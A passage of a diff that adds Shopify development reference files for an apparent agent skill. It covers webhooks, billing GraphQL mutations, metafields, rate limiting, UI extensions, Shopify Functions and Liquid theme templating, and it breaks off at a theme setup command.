uri = "/webhooks/orders/create"
|
||||
|
||||
[[webhooks.subscriptions]]
|
||||
topics = ["products/update"]
|
||||
uri = "/webhooks/products/update"
|
||||
|
||||
[[webhooks.subscriptions]]
|
||||
topics = ["app/uninstalled"]
|
||||
uri = "/webhooks/app/uninstalled"
|
||||
|
||||
# GDPR mandatory webhooks
|
||||
[webhooks.privacy_compliance]
|
||||
customer_data_request_url = "/webhooks/gdpr/data-request"
|
||||
customer_deletion_url = "/webhooks/gdpr/customer-deletion"
|
||||
shop_deletion_url = "/webhooks/gdpr/shop-deletion"
|
||||
```
|
||||
|
||||
### Webhook Handler
|
||||
|
||||
```javascript
|
||||
import crypto from "crypto";
|
||||
|
||||
function verifyWebhook(req) {
|
||||
const hmac = req.headers["x-shopify-hmac-sha256"];
|
||||
const body = req.rawBody; // Raw body buffer
|
||||
|
||||
const hash = crypto
|
||||
.createHmac("sha256", process.env.SHOPIFY_API_SECRET)
|
||||
.update(body, "utf8")
|
||||
.digest("base64");
|
||||
|
||||
return hmac === hash;
|
||||
}
|
||||
|
||||
app.post("/webhooks/orders/create", async (req, res) => {
|
||||
if (!verifyWebhook(req)) {
|
||||
return res.status(401).send("Unauthorized");
|
||||
}
|
||||
|
||||
const order = req.body;
|
||||
console.log("New order:", order.id, order.name);
|
||||
|
||||
// Process order...
|
||||
|
||||
res.status(200).send("OK");
|
||||
});
|
||||
```
|
||||
|
||||
### Common Webhook Topics
|
||||
|
||||
**Orders:**
|
||||
|
||||
- `orders/create`, `orders/updated`, `orders/delete`
|
||||
- `orders/paid`, `orders/cancelled`, `orders/fulfilled`
|
||||
|
||||
**Products:**
|
||||
|
||||
- `products/create`, `products/update`, `products/delete`
|
||||
|
||||
**Customers:**
|
||||
|
||||
- `customers/create`, `customers/update`, `customers/delete`
|
||||
|
||||
**Inventory:**
|
||||
|
||||
- `inventory_levels/update`
|
||||
|
||||
**App:**
|
||||
|
||||
- `app/uninstalled` (critical for cleanup)
|
||||
|
||||
## Billing Integration
|
||||
|
||||
### App Charges
|
||||
|
||||
**One-time Charge:**
|
||||
|
||||
```graphql
|
||||
mutation CreateCharge($input: AppPurchaseOneTimeInput!) {
|
||||
appPurchaseOneTimeCreate(input: $input) {
|
||||
appPurchaseOneTime {
|
||||
id
|
||||
name
|
||||
price {
|
||||
amount
|
||||
}
|
||||
status
|
||||
confirmationUrl
|
||||
}
|
||||
userErrors {
|
||||
field
|
||||
message
|
||||
}
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
Variables:
|
||||
|
||||
```json
|
||||
{
|
||||
"input": {
|
||||
"name": "Premium Feature",
|
||||
"price": { "amount": 49.99, "currencyCode": "USD" },
|
||||
"returnUrl": "https://your-app.com/billing/callback"
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
**Recurring Charge (Subscription):**
|
||||
|
||||
```graphql
|
||||
mutation CreateSubscription(
|
||||
$name: String!
|
||||
$returnUrl: URL!
|
||||
$lineItems: [AppSubscriptionLineItemInput!]!
|
||||
$trialDays: Int
|
||||
) {
|
||||
appSubscriptionCreate(
|
||||
name: $name
|
||||
returnUrl: $returnUrl
|
||||
lineItems: $lineItems
|
||||
trialDays: $trialDays
|
||||
) {
|
||||
appSubscription {
|
||||
id
|
||||
name
|
||||
status
|
||||
}
|
||||
confirmationUrl
|
||||
userErrors {
|
||||
field
|
||||
message
|
||||
}
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
Variables:
|
||||
|
||||
```json
|
||||
{
|
||||
"name": "Monthly Subscription",
|
||||
"returnUrl": "https://your-app.com/billing/callback",
|
||||
"trialDays": 7,
|
||||
"lineItems": [
|
||||
{
|
||||
"plan": {
|
||||
"appRecurringPricingDetails": {
|
||||
"price": { "amount": 29.99, "currencyCode": "USD" },
|
||||
"interval": "EVERY_30_DAYS"
|
||||
}
|
||||
}
|
||||
}
|
||||
]
|
||||
}
|
||||
```
|
||||
|
||||
**Usage-based Billing:**
|
||||
|
||||
```graphql
|
||||
mutation CreateUsageCharge(
|
||||
$subscriptionLineItemId: ID!
|
||||
$price: MoneyInput!
|
||||
$description: String!
|
||||
) {
|
||||
appUsageRecordCreate(
|
||||
subscriptionLineItemId: $subscriptionLineItemId
|
||||
price: $price
|
||||
description: $description
|
||||
) {
|
||||
appUsageRecord {
|
||||
id
|
||||
price {
|
||||
amount
|
||||
currencyCode
|
||||
}
|
||||
description
|
||||
}
|
||||
userErrors {
|
||||
field
|
||||
message
|
||||
}
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
Variables:
|
||||
|
||||
```json
|
||||
{
|
||||
"subscriptionLineItemId": "gid://shopify/AppSubscriptionLineItem/123",
|
||||
"price": { "amount": "5.00", "currencyCode": "USD" },
|
||||
"description": "100 API calls used"
|
||||
}
|
||||
```
|
||||
|
||||
## Metafields
|
||||
|
||||
### Create/Update Metafields
|
||||
|
||||
```graphql
|
||||
mutation SetMetafields($metafields: [MetafieldsSetInput!]!) {
|
||||
metafieldsSet(metafields: $metafields) {
|
||||
metafields {
|
||||
id
|
||||
namespace
|
||||
key
|
||||
value
|
||||
}
|
||||
userErrors {
|
||||
field
|
||||
message
|
||||
}
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
Variables:
|
||||
|
||||
```json
|
||||
{
|
||||
"metafields": [
|
||||
{
|
||||
"ownerId": "gid://shopify/Product/123",
|
||||
"namespace": "custom",
|
||||
"key": "instructions",
|
||||
"value": "Handle with care",
|
||||
"type": "single_line_text_field"
|
||||
}
|
||||
]
|
||||
}
|
||||
```
|
||||
|
||||
**Metafield Types:**
|
||||
|
||||
- `single_line_text_field`, `multi_line_text_field`
|
||||
- `number_integer`, `number_decimal`
|
||||
- `date`, `date_time`
|
||||
- `url`, `json`
|
||||
- `file_reference`, `product_reference`
|
||||
|
||||
## Rate Limiting
|
||||
|
||||
### GraphQL Cost-Based Limits
|
||||
|
||||
**Limits:**
|
||||
|
||||
- Available points: 2000
|
||||
- Restore rate: 100 points/second
|
||||
- Max query cost: 2000
|
||||
|
||||
**Check Cost:**
|
||||
|
||||
```javascript
|
||||
const response = await graphqlRequest(shop, token, query);
|
||||
const cost = response.extensions?.cost;
|
||||
|
||||
console.log(
|
||||
`Cost: ${cost.actualQueryCost}/${cost.throttleStatus.maximumAvailable}`,
|
||||
);
|
||||
```
|
||||
|
||||
**Handle Throttling:**
|
||||
|
||||
```javascript
|
||||
async function graphqlWithRetry(shop, token, query, retries = 3) {
|
||||
for (let i = 0; i < retries; i++) {
|
||||
try {
|
||||
return await graphqlRequest(shop, token, query);
|
||||
} catch (error) {
|
||||
if (error.message.includes("Throttled") && i < retries - 1) {
|
||||
await sleep(Math.pow(2, i) * 1000); // Exponential backoff
|
||||
continue;
|
||||
}
|
||||
throw error;
|
||||
}
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
## Best Practices
|
||||
|
||||
**Security:**
|
||||
|
||||
- Store credentials in environment variables
|
||||
- Verify webhook HMAC signatures
|
||||
- Validate OAuth state parameter
|
||||
- Use HTTPS for all endpoints
|
||||
- Implement rate limiting on your endpoints
|
||||
|
||||
**Performance:**
|
||||
|
||||
- Cache access tokens securely
|
||||
- Use bulk operations for large datasets
|
||||
- Implement pagination for queries
|
||||
- Monitor GraphQL query costs
|
||||
|
||||
**Reliability:**
|
||||
|
||||
- Implement exponential backoff for retries
|
||||
- Handle webhook delivery failures
|
||||
- Log errors for debugging
|
||||
- Monitor app health metrics
|
||||
|
||||
**Compliance:**
|
||||
|
||||
- Implement GDPR webhooks (mandatory)
|
||||
- Handle customer data deletion requests
|
||||
- Provide data export functionality
|
||||
- Follow data retention policies
|
||||
555
skills/shopify-development/references/extensions.md
Normal file
555
skills/shopify-development/references/extensions.md
Normal file
@@ -0,0 +1,555 @@
|
||||
# Extensions Reference
|
||||
|
||||
Guide for building UI extensions and Shopify Functions.
|
||||
|
||||
## Checkout UI Extensions
|
||||
|
||||
Customize checkout and thank-you pages with native-rendered components.
|
||||
|
||||
### Extension Points
|
||||
|
||||
**Block Targets (Merchant-Configurable):**
|
||||
|
||||
- `purchase.checkout.block.render` - Main checkout
|
||||
- `purchase.thank-you.block.render` - Thank you page
|
||||
|
||||
**Static Targets (Fixed Position):**
|
||||
|
||||
- `purchase.checkout.header.render-after`
|
||||
- `purchase.checkout.contact.render-before`
|
||||
- `purchase.checkout.shipping-option-list.render-after`
|
||||
- `purchase.checkout.payment-method-list.render-after`
|
||||
- `purchase.checkout.footer.render-before`
|
||||
|
||||
### Setup
|
||||
|
||||
```bash
|
||||
shopify app generate extension --type checkout_ui_extension
|
||||
```
|
||||
|
||||
Configuration (`shopify.extension.toml`):
|
||||
|
||||
```toml
|
||||
api_version = "2026-01"
|
||||
name = "gift-message"
|
||||
type = "ui_extension"
|
||||
|
||||
[[extensions.targeting]]
|
||||
target = "purchase.checkout.block.render"
|
||||
|
||||
[capabilities]
|
||||
network_access = true
|
||||
api_access = true
|
||||
```
|
||||
|
||||
### Basic Example
|
||||
|
||||
```javascript
|
||||
import {
|
||||
reactExtension,
|
||||
BlockStack,
|
||||
TextField,
|
||||
Checkbox,
|
||||
useApi,
|
||||
} from "@shopify/ui-extensions-react/checkout";
|
||||
|
||||
export default reactExtension("purchase.checkout.block.render", () => (
|
||||
<Extension />
|
||||
));
|
||||
|
||||
function Extension() {
|
||||
const [message, setMessage] = useState("");
|
||||
const [isGift, setIsGift] = useState(false);
|
||||
const { applyAttributeChange } = useApi();
|
||||
|
||||
useEffect(() => {
|
||||
if (isGift) {
|
||||
applyAttributeChange({
|
||||
type: "updateAttribute",
|
||||
key: "gift_message",
|
||||
value: message,
|
||||
});
|
||||
}
|
||||
}, [message, isGift]);
|
||||
|
||||
return (
|
||||
<BlockStack spacing="loose">
|
||||
<Checkbox checked={isGift} onChange={setIsGift}>
|
||||
This is a gift
|
||||
</Checkbox>
|
||||
{isGift && (
|
||||
<TextField
|
||||
label="Gift Message"
|
||||
value={message}
|
||||
onChange={setMessage}
|
||||
multiline={3}
|
||||
/>
|
||||
)}
|
||||
</BlockStack>
|
||||
);
|
||||
}
|
||||
```
|
||||
|
||||
### Common Hooks
|
||||
|
||||
**useApi:**
|
||||
|
||||
```javascript
|
||||
const { extensionPoint, shop, storefront, i18n, sessionToken } = useApi();
|
||||
```
|
||||
|
||||
**useCartLines:**
|
||||
|
||||
```javascript
|
||||
const lines = useCartLines();
|
||||
lines.forEach((line) => {
|
||||
console.log(line.merchandise.product.title, line.quantity);
|
||||
});
|
||||
```
|
||||
|
||||
**useShippingAddress:**
|
||||
|
||||
```javascript
|
||||
const address = useShippingAddress();
|
||||
console.log(address.city, address.countryCode);
|
||||
```
|
||||
|
||||
**useApplyCartLinesChange:**
|
||||
|
||||
```javascript
|
||||
const applyChange = useApplyCartLinesChange();
|
||||
|
||||
async function addItem() {
|
||||
await applyChange({
|
||||
type: "addCartLine",
|
||||
merchandiseId: "gid://shopify/ProductVariant/123",
|
||||
quantity: 1,
|
||||
});
|
||||
}
|
||||
```
|
||||
|
||||
### Core Components
|
||||
|
||||
**Layout:**
|
||||
|
||||
- `BlockStack` - Vertical stacking
|
||||
- `InlineStack` - Horizontal layout
|
||||
- `Grid`, `GridItem` - Grid layout
|
||||
- `View` - Container
|
||||
- `Divider` - Separator
|
||||
|
||||
**Input:**
|
||||
|
||||
- `TextField` - Text input
|
||||
- `Checkbox` - Boolean
|
||||
- `Select` - Dropdown
|
||||
- `DatePicker` - Date selection
|
||||
- `Form` - Form wrapper
|
||||
|
||||
**Display:**
|
||||
|
||||
- `Text`, `Heading` - Typography
|
||||
- `Banner` - Messages
|
||||
- `Badge` - Status
|
||||
- `Image` - Images
|
||||
- `Link` - Hyperlinks
|
||||
- `List`, `ListItem` - Lists
|
||||
|
||||
**Interactive:**
|
||||
|
||||
- `Button` - Actions
|
||||
- `Modal` - Overlays
|
||||
- `Pressable` - Click areas
|
||||
|
||||
## Admin UI Extensions
|
||||
|
||||
Extend Shopify admin interface.
|
||||
|
||||
### Admin Action
|
||||
|
||||
Custom actions on resource pages.
|
||||
|
||||
```bash
|
||||
shopify app generate extension --type admin_action
|
||||
```
|
||||
|
||||
```javascript
|
||||
import {
|
||||
reactExtension,
|
||||
AdminAction,
|
||||
Button,
|
||||
} from "@shopify/ui-extensions-react/admin";
|
||||
|
||||
export default reactExtension("admin.product-details.action.render", () => (
|
||||
<Extension />
|
||||
));
|
||||
|
||||
function Extension() {
|
||||
const { data } = useData();
|
||||
|
||||
async function handleExport() {
|
||||
const response = await fetch("/api/export", {
|
||||
method: "POST",
|
||||
body: JSON.stringify({ productId: data.product.id }),
|
||||
});
|
||||
console.log("Exported:", await response.json());
|
||||
}
|
||||
|
||||
return (
|
||||
<AdminAction
|
||||
title="Export Product"
|
||||
primaryAction={<Button onPress={handleExport}>Export</Button>}
|
||||
/>
|
||||
);
|
||||
}
|
||||
```
|
||||
|
||||
**Targets:**
|
||||
|
||||
- `admin.product-details.action.render`
|
||||
- `admin.order-details.action.render`
|
||||
- `admin.customer-details.action.render`
|
||||
|
||||
### Admin Block
|
||||
|
||||
Embedded content in admin pages.
|
||||
|
||||
```javascript
|
||||
import {
|
||||
reactExtension,
|
||||
BlockStack,
|
||||
Text,
|
||||
Badge,
|
||||
} from "@shopify/ui-extensions-react/admin";
|
||||
|
||||
export default reactExtension("admin.product-details.block.render", () => (
|
||||
<Extension />
|
||||
));
|
||||
|
||||
function Extension() {
|
||||
const { data } = useData();
|
||||
const [analytics, setAnalytics] = useState(null);
|
||||
|
||||
useEffect(() => {
|
||||
fetchAnalytics(data.product.id).then(setAnalytics);
|
||||
}, []);
|
||||
|
||||
return (
|
||||
<BlockStack>
|
||||
<Text variant="headingMd">Product Analytics</Text>
|
||||
<Text>Views: {analytics?.views || 0}</Text>
|
||||
<Text>Conversions: {analytics?.conversions || 0}</Text>
|
||||
<Badge tone={analytics?.trending ? "success" : "info"}>
|
||||
{analytics?.trending ? "Trending" : "Normal"}
|
||||
</Badge>
|
||||
</BlockStack>
|
||||
);
|
||||
}
|
||||
```
|
||||
|
||||
**Targets:**
|
||||
|
||||
- `admin.product-details.block.render`
|
||||
- `admin.order-details.block.render`
|
||||
- `admin.customer-details.block.render`
|
||||
|
||||
## POS UI Extensions
|
||||
|
||||
Customize Point of Sale experience.
|
||||
|
||||
### Smart Grid Tile
|
||||
|
||||
Quick access action on POS home screen.
|
||||
|
||||
```javascript
|
||||
import {
|
||||
reactExtension,
|
||||
SmartGridTile,
|
||||
} from "@shopify/ui-extensions-react/pos";
|
||||
|
||||
export default reactExtension("pos.home.tile.render", () => <Extension />);
|
||||
|
||||
function Extension() {
|
||||
function handlePress() {
|
||||
// Navigate to custom workflow
|
||||
}
|
||||
|
||||
return (
|
||||
<SmartGridTile
|
||||
title="Gift Cards"
|
||||
subtitle="Manage gift cards"
|
||||
onPress={handlePress}
|
||||
/>
|
||||
);
|
||||
}
|
||||
```
|
||||
|
||||
### POS Modal
|
||||
|
||||
Full-screen workflow.
|
||||
|
||||
```javascript
|
||||
import {
|
||||
reactExtension,
|
||||
Screen,
|
||||
BlockStack,
|
||||
Button,
|
||||
TextField,
|
||||
} from "@shopify/ui-extensions-react/pos";
|
||||
|
||||
export default reactExtension("pos.home.modal.render", () => <Extension />);
|
||||
|
||||
function Extension() {
|
||||
const { navigation } = useApi();
|
||||
const [amount, setAmount] = useState("");
|
||||
|
||||
function handleIssue() {
|
||||
// Issue gift card
|
||||
navigation.pop();
|
||||
}
|
||||
|
||||
return (
|
||||
<Screen name="Gift Card" title="Issue Gift Card">
|
||||
<BlockStack>
|
||||
<TextField label="Amount" value={amount} onChange={setAmount} />
|
||||
<TextField label="Recipient Email" />
|
||||
<Button onPress={handleIssue}>Issue</Button>
|
||||
</BlockStack>
|
||||
</Screen>
|
||||
);
|
||||
}
|
||||
```
|
||||
|
||||
## Customer Account Extensions
|
||||
|
||||
Customize customer account pages.
|
||||
|
||||
### Order Status Extension
|
||||
|
||||
```javascript
|
||||
import {
|
||||
reactExtension,
|
||||
BlockStack,
|
||||
Text,
|
||||
Button,
|
||||
} from "@shopify/ui-extensions-react/customer-account";
|
||||
|
||||
export default reactExtension(
|
||||
"customer-account.order-status.block.render",
|
||||
() => <Extension />,
|
||||
);
|
||||
|
||||
function Extension() {
|
||||
const { order } = useApi();
|
||||
|
||||
function handleReturn() {
|
||||
// Initiate return
|
||||
}
|
||||
|
||||
return (
|
||||
<BlockStack>
|
||||
<Text variant="headingMd">Need to return?</Text>
|
||||
<Text>Start return for order {order.name}</Text>
|
||||
<Button onPress={handleReturn}>Start Return</Button>
|
||||
</BlockStack>
|
||||
);
|
||||
}
|
||||
```
|
||||
|
||||
**Targets:**
|
||||
|
||||
- `customer-account.order-status.block.render`
|
||||
- `customer-account.order-index.block.render`
|
||||
- `customer-account.profile.block.render`
|
||||
|
||||
## Shopify Functions
|
||||
|
||||
Serverless backend customization.
|
||||
|
||||
### Function Types
|
||||
|
||||
**Discounts:**
|
||||
|
||||
- `order_discount` - Order-level discounts
|
||||
- `product_discount` - Product-specific discounts
|
||||
- `shipping_discount` - Shipping discounts
|
||||
|
||||
**Payment Customization:**
|
||||
|
||||
- Hide/rename/reorder payment methods
|
||||
|
||||
**Delivery Customization:**
|
||||
|
||||
- Custom shipping options
|
||||
- Delivery rules
|
||||
|
||||
**Validation:**
|
||||
|
||||
- Cart validation rules
|
||||
- Checkout validation
|
||||
|
||||
### Create Function
|
||||
|
||||
```bash
|
||||
shopify app generate extension --type function
|
||||
```
|
||||
|
||||
### Order Discount Function
|
||||
|
||||
```javascript
|
||||
// input.graphql
|
||||
query Input {
|
||||
cart {
|
||||
lines {
|
||||
quantity
|
||||
merchandise {
|
||||
... on ProductVariant {
|
||||
product {
|
||||
hasTag(tag: "bulk-discount")
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// function.js
|
||||
export default function orderDiscount(input) {
|
||||
const targets = input.cart.lines
|
||||
.filter(line => line.merchandise.product.hasTag)
|
||||
.map(line => ({
|
||||
productVariant: { id: line.merchandise.id }
|
||||
}));
|
||||
|
||||
if (targets.length === 0) {
|
||||
return { discounts: [] };
|
||||
}
|
||||
|
||||
return {
|
||||
discounts: [{
|
||||
targets,
|
||||
value: {
|
||||
percentage: {
|
||||
value: 10 // 10% discount
|
||||
}
|
||||
}
|
||||
}]
|
||||
};
|
||||
}
|
||||
```
|
||||
|
||||
### Payment Customization Function
|
||||
|
||||
```javascript
|
||||
export default function paymentCustomization(input) {
|
||||
const hidePaymentMethods = input.cart.lines.some(
|
||||
(line) => line.merchandise.product.hasTag,
|
||||
);
|
||||
|
||||
if (!hidePaymentMethods) {
|
||||
return { operations: [] };
|
||||
}
|
||||
|
||||
return {
|
||||
operations: [
|
||||
{
|
||||
hide: {
|
||||
paymentMethodId: "gid://shopify/PaymentMethod/123",
|
||||
},
|
||||
},
|
||||
],
|
||||
};
|
||||
}
|
||||
```
|
||||
|
||||
### Validation Function
|
||||
|
||||
```javascript
|
||||
export default function cartValidation(input) {
|
||||
const errors = [];
|
||||
|
||||
// Max 5 items per cart
|
||||
if (input.cart.lines.length > 5) {
|
||||
errors.push({
|
||||
localizedMessage: "Maximum 5 items allowed per order",
|
||||
target: "cart",
|
||||
});
|
||||
}
|
||||
|
||||
// Min $50 for wholesale
|
||||
const isWholesale = input.cart.lines.some(
|
||||
(line) => line.merchandise.product.hasTag,
|
||||
);
|
||||
|
||||
if (isWholesale && input.cart.cost.totalAmount.amount < 50) {
|
||||
errors.push({
|
||||
localizedMessage: "Wholesale orders require $50 minimum",
|
||||
target: "cart",
|
||||
});
|
||||
}
|
||||
|
||||
return { errors };
|
||||
}
|
||||
```
|
||||
|
||||
## Network Requests
|
||||
|
||||
Extensions can call external APIs.
|
||||
|
||||
```javascript
|
||||
import { useApi } from "@shopify/ui-extensions-react/checkout";
|
||||
|
||||
function Extension() {
|
||||
const { sessionToken } = useApi();
|
||||
|
||||
async function fetchData() {
|
||||
const token = await sessionToken.get();
|
||||
|
||||
const response = await fetch("https://your-app.com/api/data", {
|
||||
headers: {
|
||||
Authorization: `Bearer ${token}`,
|
||||
"Content-Type": "application/json",
|
||||
},
|
||||
});
|
||||
|
||||
return await response.json();
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
## Best Practices
|
||||
|
||||
**Performance:**
|
||||
|
||||
- Lazy load data
|
||||
- Memoize expensive computations
|
||||
- Use loading states
|
||||
- Minimize re-renders
|
||||
|
||||
**UX:**
|
||||
|
||||
- Provide clear error messages
|
||||
- Show loading indicators
|
||||
- Validate inputs
|
||||
- Support keyboard navigation
|
||||
|
||||
**Security:**
|
||||
|
||||
- Verify session tokens on backend
|
||||
- Sanitize user input
|
||||
- Use HTTPS for all requests
|
||||
- Don't expose sensitive data
|
||||
|
||||
**Testing:**
|
||||
|
||||
- Test on development stores
|
||||
- Verify mobile/desktop
|
||||
- Check accessibility
|
||||
- Test edge cases
|
||||
|
||||
## Resources
|
||||
|
||||
- Checkout Extensions: https://shopify.dev/docs/api/checkout-extensions
|
||||
- Admin Extensions: https://shopify.dev/docs/apps/admin/extensions
|
||||
- Functions: https://shopify.dev/docs/apps/functions
|
||||
- Components: https://shopify.dev/docs/api/checkout-ui-extensions/components
|
||||
498
skills/shopify-development/references/themes.md
Normal file
498
skills/shopify-development/references/themes.md
Normal file
@@ -0,0 +1,498 @@
|
||||
# Themes Reference
|
||||
|
||||
Guide for developing Shopify themes with Liquid templating.
|
||||
|
||||
## Liquid Templating
|
||||
|
||||
### Syntax Basics
|
||||
|
||||
**Objects (Output):**
|
||||
```liquid
|
||||
{{ product.title }}
|
||||
{{ product.price | money }}
|
||||
{{ customer.email }}
|
||||
```
|
||||
|
||||
**Tags (Logic):**
|
||||
```liquid
|
||||
{% if product.available %}
|
||||
<button>Add to Cart</button>
|
||||
{% else %}
|
||||
<p>Sold Out</p>
|
||||
{% endif %}
|
||||
|
||||
{% for product in collection.products %}
|
||||
{{ product.title }}
|
||||
{% endfor %}
|
||||
|
||||
{% case product.type %}
|
||||
{% when 'Clothing' %}
|
||||
<span>Apparel</span>
|
||||
{% when 'Shoes' %}
|
||||
<span>Footwear</span>
|
||||
{% else %}
|
||||
<span>Other</span>
|
||||
{% endcase %}
|
||||
```
|
||||
|
||||
**Filters (Transform):**
|
||||
```liquid
|
||||
{{ product.title | upcase }}
|
||||
{{ product.price | money }}
|
||||
{{ product.description | strip_html | truncate: 100 }}
|
||||
{{ product.image | img_url: 'medium' }}
|
||||
{{ 'now' | date: '%B %d, %Y' }}
|
||||
```
|
||||
|
||||
### Common Objects
|
||||
|
||||
**Product:**
|
||||
```liquid
|
||||
{{ product.id }}
|
||||
{{ product.title }}
|
||||
{{ product.handle }}
|
||||
{{ product.description }}
|
||||
{{ product.price }}
|
||||
{{ product.compare_at_price }}
|
||||
{{ product.available }}
|
||||
{{ product.type }}
|
||||
{{ product.vendor }}
|
||||
{{ product.tags }}
|
||||
{{ product.images }}
|
||||
{{ product.variants }}
|
||||
{{ product.featured_image }}
|
||||
{{ product.url }}
|
||||
```
|
||||
|
||||
**Collection:**
|
||||
```liquid
|
||||
{{ collection.title }}
|
||||
{{ collection.handle }}
|
||||
{{ collection.description }}
|
||||
{{ collection.products }}
|
||||
{{ collection.products_count }}
|
||||
{{ collection.image }}
|
||||
{{ collection.url }}
|
||||
```
|
||||
|
||||
**Cart:**
|
||||
```liquid
|
||||
{{ cart.item_count }}
|
||||
{{ cart.total_price }}
|
||||
{{ cart.items }}
|
||||
{{ cart.note }}
|
||||
{{ cart.attributes }}
|
||||
```
|
||||
|
||||
**Customer:**
|
||||
```liquid
|
||||
{{ customer.email }}
|
||||
{{ customer.first_name }}
|
||||
{{ customer.last_name }}
|
||||
{{ customer.orders_count }}
|
||||
{{ customer.total_spent }}
|
||||
{{ customer.addresses }}
|
||||
{{ customer.default_address }}
|
||||
```
|
||||
|
||||
**Shop:**
|
||||
```liquid
|
||||
{{ shop.name }}
|
||||
{{ shop.email }}
|
||||
{{ shop.domain }}
|
||||
{{ shop.currency }}
|
||||
{{ shop.money_format }}
|
||||
{{ shop.enabled_payment_types }}
|
||||
```
|
||||
|
||||
### Common Filters
|
||||
|
||||
**String:**
|
||||
- `upcase`, `downcase`, `capitalize`
|
||||
- `strip_html`, `strip_newlines`
|
||||
- `truncate: 100`, `truncatewords: 20`
|
||||
- `replace: 'old', 'new'`
|
||||
|
||||
**Number:**
|
||||
- `money` - Format currency
|
||||
- `round`, `ceil`, `floor`
|
||||
- `times`, `divided_by`, `plus`, `minus`
|
||||
|
||||
**Array:**
|
||||
- `join: ', '`
|
||||
- `first`, `last`
|
||||
- `size`
|
||||
- `map: 'property'`
|
||||
- `where: 'property', 'value'`
|
||||
|
||||
**URL:**
|
||||
- `img_url: 'size'` - Image URL
|
||||
- `url_for_type`, `url_for_vendor`
|
||||
- `link_to`, `link_to_type`
|
||||
|
||||
**Date:**
|
||||
- `date: '%B %d, %Y'`
|
||||
|
||||
## Theme Architecture
|
||||
|
||||
### Directory Structure
|
||||
|
||||
```
|
||||
theme/
|
||||
├── assets/ # CSS, JS, images
|
||||
├── config/ # Theme settings
|
||||
│ ├── settings_schema.json
|
||||
│ └── settings_data.json
|
||||
├── layout/ # Base templates
|
||||
│ └── theme.liquid
|
||||
├── locales/ # Translations
|
||||
│ └── en.default.json
|
||||
├── sections/ # Reusable blocks
|
||||
│ ├── header.liquid
|
||||
│ ├── footer.liquid
|
||||
│ └── product-grid.liquid
|
||||
├── snippets/ # Small components
|
||||
│ ├── product-card.liquid
|
||||
│ └── icon.liquid
|
||||
└── templates/ # Page templates
|
||||
├── index.json
|
||||
├── product.json
|
||||
├── collection.json
|
||||
└── cart.liquid
|
||||
```
|
||||
|
||||
### Layout
|
||||
|
||||
Base template wrapping all pages (`layout/theme.liquid`):
|
||||
|
||||
```liquid
|
||||
<!DOCTYPE html>
|
||||
<html lang="{{ request.locale.iso_code }}">
|
||||
<head>
|
||||
<meta charset="utf-8">
|
||||
<meta name="viewport" content="width=device-width,initial-scale=1">
|
||||
<title>{{ page_title }}</title>
|
||||
|
||||
{{ content_for_header }}
|
||||
|
||||
<link rel="stylesheet" href="{{ 'theme.css' | asset_url }}">
|
||||
</head>
|
||||
<body>
|
||||
{% section 'header' %}
|
||||
|
||||
<main>
|
||||
{{ content_for_layout }}
|
||||
</main>
|
||||
|
||||
{% section 'footer' %}
|
||||
|
||||
<script src="{{ 'theme.js' | asset_url }}"></script>
|
||||
</body>
|
||||
</html>
|
||||
```
|
||||
|
||||
### Templates
|
||||
|
||||
Page-specific structures (`templates/product.json`):
|
||||
|
||||
```json
|
||||
{
|
||||
"sections": {
|
||||
"main": {
|
||||
"type": "product-template",
|
||||
"settings": {
|
||||
"show_vendor": true,
|
||||
"show_quantity_selector": true
|
||||
}
|
||||
},
|
||||
"recommendations": {
|
||||
"type": "product-recommendations"
|
||||
}
|
||||
},
|
||||
"order": ["main", "recommendations"]
|
||||
}
|
||||
```
|
||||
|
||||
Legacy format (`templates/product.liquid`):
|
||||
```liquid
|
||||
<div class="product">
|
||||
<div class="product-images">
|
||||
<img src="{{ product.featured_image | img_url: 'large' }}" alt="{{ product.title }}">
|
||||
</div>
|
||||
|
||||
<div class="product-details">
|
||||
<h1>{{ product.title }}</h1>
|
||||
<p class="price">{{ product.price | money }}</p>
|
||||
|
||||
{% form 'product', product %}
|
||||
<select name="id">
|
||||
{% for variant in product.variants %}
|
||||
<option value="{{ variant.id }}">{{ variant.title }} - {{ variant.price | money }}</option>
|
||||
{% endfor %}
|
||||
</select>
|
||||
|
||||
<button type="submit">Add to Cart</button>
|
||||
{% endform %}
|
||||
</div>
|
||||
</div>
|
||||
```
|
||||
|
||||
### Sections
|
||||
|
||||
Reusable content blocks (`sections/product-grid.liquid`):
|
||||
|
||||
```liquid
|
||||
<div class="product-grid">
|
||||
{% for product in section.settings.collection.products %}
|
||||
<div class="product-card">
|
||||
<a href="{{ product.url }}">
|
||||
<img src="{{ product.featured_image | img_url: 'medium' }}" alt="{{ product.title }}">
|
||||
<h3>{{ product.title }}</h3>
|
||||
<p>{{ product.price | money }}</p>
|
||||
</a>
|
||||
</div>
|
||||
{% endfor %}
|
||||
</div>
|
||||
|
||||
{% schema %}
|
||||
{
|
||||
"name": "Product Grid",
|
||||
"settings": [
|
||||
{
|
||||
"type": "collection",
|
||||
"id": "collection",
|
||||
"label": "Collection"
|
||||
},
|
||||
{
|
||||
"type": "range",
|
||||
"id": "products_per_row",
|
||||
"min": 2,
|
||||
"max": 5,
|
||||
"step": 1,
|
||||
"default": 4,
|
||||
"label": "Products per row"
|
||||
}
|
||||
],
|
||||
"presets": [
|
||||
{
|
||||
"name": "Product Grid"
|
||||
}
|
||||
]
|
||||
}
|
||||
{% endschema %}
|
||||
```
|
||||
|
||||
### Snippets
|
||||
|
||||
Small reusable components (`snippets/product-card.liquid`):
|
||||
|
||||
```liquid
|
||||
<div class="product-card">
|
||||
<a href="{{ product.url }}">
|
||||
{% if product.featured_image %}
|
||||
<img src="{{ product.featured_image | img_url: 'medium' }}" alt="{{ product.title }}">
|
||||
{% endif %}
|
||||
<h3>{{ product.title }}</h3>
|
||||
<p class="price">{{ product.price | money }}</p>
|
||||
{% if product.compare_at_price > product.price %}
|
||||
<p class="sale-price">{{ product.compare_at_price | money }}</p>
|
||||
{% endif %}
|
||||
</a>
|
||||
</div>
|
||||
```
|
||||
|
||||
Include snippet:
|
||||
```liquid
|
||||
{% render 'product-card', product: product %}
|
||||
```
|
||||
|
||||
## Development Workflow
|
||||
|
||||
### Setup
|
||||
|
||||
```bash
|
||||
# Initialize new theme
